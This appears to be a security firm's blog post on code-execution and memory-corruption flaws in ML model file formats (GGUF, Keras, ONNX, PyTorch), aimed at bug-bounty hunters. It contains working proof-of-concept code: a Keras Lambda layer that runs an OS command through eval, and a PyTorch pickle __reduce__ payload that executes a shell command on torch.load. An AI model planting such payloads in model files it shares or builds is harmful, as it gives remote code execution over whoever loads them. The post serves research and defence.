The Overlooked Attack Surface: Hunting 0-Days in AI Model Files

When discussing cybersecurity in Artificial Intelligence, everyone fixates on API security, prompt injections, and web vulnerabilities. Meanwhile, a massive, uncharted attack surface is hiding in plain sight: Machine Learning (ML) Model File Formats.

After training a massive model like ChatGPT, the weights must be saved. However, files with extensions like .pkl, .gguf, .onnx, or .pth aren't just simple data blobs. They are complex formats with their own parsing quirks, headers, and mechanisms capable of interacting with the operating system.

The critical moment? The moment a user (or an automated pipeline) loads that model file into memory. Buffer overflows, Remote Code Execution (RCE), and all the dark arts of traditional binary exploitation awake in a fresh context that hasn't been picked clean by decades of security research. If you're a bug hunter, this is largely uncharted territory.

At Eresus Security, we are actively investigating the top structural vulnerabilities hidden in AI model loading—known as Model File Vulnerabilities (MFVs).

1. GGUF Heap Overflow: A Vulnerability in Model Parsing

In frameworks utilizing the relatively new GGUF format (like ggml), the parsing logic reads the model's key-value metadata. If the codebase fails to properly validate header fields—such as n_kv (the number of key-value entries)—it opens the door to out-of-bounds writes on the heap.

How it Works: The file header dictates how many key-value pairs the loader should expect. The loader allocates an array based on this number. If an attacker manipulates the n_kv value to be absurdly huge, the loop writing the values will blow past the allocated memory boundaries, leading to heap corruption.

What to look for? Scan for C/C++ memory allocation functions (malloc, calloc) that blindly trust counters extracted from headers inside loading functions like parse_header() or read_weights().

2. Keras Lambda Layers: Code Execution Risks

Keras models (like .h5 files) can embed custom code via Lambda layers. While technically a "feature," loading a Keras model containing a Lambda layer means you are inherently executing arbitrary Python code.

An attacker can bake malicious code into a Lambda layer within a seemingly benign Keras model. When the victim runs the standard loading function, they unwittingly achieve RCE:

# Setup for a potential vulnerability
model = Sequential([
    Dense(64, input_shape=(32,)),
    # This evaluates an OS command the moment the model is loaded!
    Lambda(lambda x: eval("__import__('os').system('echo breach')" or x)),
    Dense(10, activation='softmax')
])

What to look for? When reviewing MLOps projects, terms like "supports arbitrary Keras models" or "custom dynamic ops" are massive red flags if sandboxing is not explicitly mentioned.

3. ONNX Custom Operators: Hidden Control Flow Exploits

ONNX (Open Neural Network Exchange) acts as a universal Rosetta Stone for ML models. However, the ONNX format supports deep control flow structures (If/Loop nodes) and Native Custom Operators designed for "performance."

ONNX allows models to register custom operations executed directly in C++/CUDA native code. If a machine learning pipeline blindly loads an ONNX file with complex branching logic intertwined with native calls, the attacker can manipulate the execution path—transforming a ML model into a sophisticated, compiled exploit delivery system.

What to look for? Search codebases for register_custom_op() or add_implementation(). Security researchers should employ structure-aware fuzzing (using tools like AFL++) to test edge cases.

4. Breaking Down a PyTorch MFV (Proof of Concept)

Let's break down an example Model File Vulnerability (MFV) to understand how a trusted tool like PyTorch can be massively exploited. This is a perfect starting point if you're looking to find and report your own MFVs.

The Role of Pickle in PyTorch: PyTorch uses Python’s pickle module for its torch.save() and torch.load() functions. The pickle protocol involves calling an object's __reduce__ method to determine how to rebuild it. If an attacker can override this method, they can control what happens during deserialization—leading to arbitrary code execution.

A Step-by-Step Walkthrough

Crafting the Malicious Model: A custom PyTorch module is defined to override __reduce__. In our PoC, the overridden method instructs the deserialization process to run an OS command (touch /tmp/poc) as soon as the model is loaded.

import torch
import os

class OverwriteFile(torch.nn.Module):
    def __reduce__(self):
        # This payload causes os.system to run the command when deserialized.
        return (os.system, ("touch /tmp/poc",))

# Create and save the malicious model.
malicious_model = OverwriteFile()
torch.save(malicious_model, "malicious_model.pth")

Executing the Payload: When an unsuspecting user tries to load the model using the standard PyTorch method, the payload triggers instantly:

import torch

# Loading the model triggers the __reduce__ payload.
torch.load("malicious_model.pth")

This PoC performs arbitrary code execution to create /tmp/poc on the victim's machine.

Why Should You Care? (The Bug Hunter's Gold Mine)

This vulnerability isn’t just a textbook case—it’s a gold mine for anyone looking to cash in on easy, high-impact exploits. Here’s why you should be all over it:

Endless Discovery Potential: Use this PyTorch PoC as a launchpad to explore similar vulnerabilities across various model formats, parsers, and machine learning applications. Most apps don't sanitize models.
Lucrative Rewards: With Bug Bounty platforms like huntr offering up to $3,000 per validated MFV, your next discovery could be both a reputation boost and a major payday. You don't need to be a reverse-engineering wizard; just bring your methodical curiosity to ML file formats!

Is your corporate infrastructure downloading opaque AI models from external sources? Let Eresus Security's Agentic Scanners audit your MLOps pipelines to secure your organization from 0-Day Model File Vulnerabilities.